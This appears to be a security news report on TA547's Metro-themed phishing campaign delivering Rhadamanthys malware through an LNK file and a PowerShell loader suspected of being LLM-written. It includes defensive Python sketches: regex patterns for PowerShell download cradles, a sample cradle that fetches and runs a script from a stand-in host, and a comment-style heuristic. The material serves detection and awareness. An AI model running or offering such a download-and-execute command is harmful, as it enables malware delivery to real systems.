The threat actor TA547 is targeting German organisations with emails impersonating the retailer Metro, deploying sophisticated techniques that include delivering Rhadamanthys malware via a suspected large language model (LLM)-generated script.
TA547, known for financially motivated cybercrime, has historically operated as an initial access broker (IAB) targeting various geographic regions. Since 2023, the group has primarily distributed NetSupport RAT but has diversified its payloads, occasionally deploying StealC and Lumma Stealer, information stealers similar to Rhadamanthys.
The analysis revealed that TA547’s campaign revolved around emails impersonating the reputable German retail company Metro. These emails, purporting to relate to invoicing, contained a password-protected ZIP file housing an LNK shortcut file.
Upon execution, the LNK file launched PowerShell to run a remote script, which in turn decoded and executed the Rhadamanthys malware entirely in memory. This approach lets the threat actor bypass traditional detection mechanisms that rely on disk-based analysis, highlighting the sophistication of their tactics.
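Because the payload never touches disk, behaviour-based defences often compensate by inspecting the shortcut's command line instead. The Python sketch below is a minimal, hypothetical illustration of that idea: the indicator patterns and the sample command lines are assumptions chosen for demonstration, not observed campaign artefacts.

```python
import re

# Hypothetical indicators loosely modelled on common "LNK -> remote
# PowerShell" download cradles; not real campaign signatures.
SUSPICIOUS_PATTERNS = [
    re.compile(r"powershell(\.exe)?\s", re.IGNORECASE),
    re.compile(r"-(enc|encodedcommand)\b", re.IGNORECASE),
    re.compile(r"(iex|invoke-expression)", re.IGNORECASE),
    re.compile(r"(downloadstring|invoke-webrequest|net\.webclient)", re.IGNORECASE),
]

def score_command_line(cmd: str) -> int:
    """Count how many suspicious indicators appear in a shortcut's target command."""
    return sum(1 for pat in SUSPICIOUS_PATTERNS if pat.search(cmd))

def is_suspicious(cmd: str, threshold: int = 2) -> bool:
    """Flag a command line when it matches at least `threshold` indicators."""
    return score_command_line(cmd) >= threshold

# Hypothetical examples for illustration only:
benign = r"C:\Windows\System32\notepad.exe invoice.txt"
cradle = (r"powershell.exe -nop -w hidden IEX (New-Object Net.WebClient)"
          r".DownloadString('http://example.invalid/x.ps1')")
```

In practice a benign command scores zero here while a download cradle trips several patterns at once; real tooling would layer this over process telemetry rather than static strings.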
One of the standout features of this campaign was the suspected use of a PowerShell script generated by a large language model (LLM) such as ChatGPT, Gemini or Copilot. The script exhibited unusual characteristics, including grammatically correct comments preceding each component, a hallmark of machine-generated content.
“Notably, when deobfuscated, the second PowerShell script that was used to load Rhadamanthys contained interesting characteristics not commonly observed in code used by threat actors (or legitimate programmers). Specifically, the PowerShell script included a pound sign followed by grammatically correct and hyper-specific comments above each component of the script,” said the researchers.
This suggests that TA547 either used LLM-enabled tools directly or sourced code from a repository built with such tools, marking a novel integration of AI-generated content into cybercrime operations.
“While it is difficult to confirm whether malicious content is created via LLMs – from malware scripts to social engineering lures – there are characteristics of such content that point to machine-generated rather than human-generated information. Regardless of whether it is human or machine-generated, the defence against such threats remains the same,” researchers noted.
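As a rough illustration of one such characteristic, the unusually high density of grammatically complete comments described above, the Python sketch below scores a script's comment style. The thresholds and helper names (`comment_stats`, `looks_machine_commented`) are illustrative assumptions, not Proofpoint's methodology.

```python
def comment_stats(script: str) -> dict:
    """Rough stylometry for PowerShell-style '#' comments.

    Returns the share of non-blank lines that are comments, and the share of
    those comments that read like full sentences (capitalised, four or more
    words). Thresholds here are illustrative assumptions.
    """
    lines = [ln.strip() for ln in script.splitlines() if ln.strip()]
    comments = [ln.lstrip("#").strip() for ln in lines if ln.startswith("#")]
    sentence_like = [c for c in comments if c[:1].isupper() and len(c.split()) >= 4]
    return {
        "comment_ratio": len(comments) / len(lines) if lines else 0.0,
        "sentence_ratio": len(sentence_like) / len(comments) if comments else 0.0,
    }

def looks_machine_commented(script: str) -> bool:
    # Flag scripts where nearly every component carries a grammatical comment.
    stats = comment_stats(script)
    return stats["comment_ratio"] >= 0.4 and stats["sentence_ratio"] >= 0.8
```

A stylistic signal like this is weak on its own, which is consistent with the researchers' point: detection should not hinge on whether the code was human- or machine-written.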
Cybersecurity researchers from Proofpoint exposed the recent TA547 campaign, which sheds light on evolving cyber threats and the adaptability of malicious actors.
Researchers have noted that LLMs can help threat actors mount sophisticated attacks. However, using an LLM changes neither the efficacy of the malware nor the ability of security tools to detect it.
Proofpoint has urged organisations to enhance their cybersecurity posture by implementing robust email security measures, behaviour-based threat detection, and regular employee security awareness training.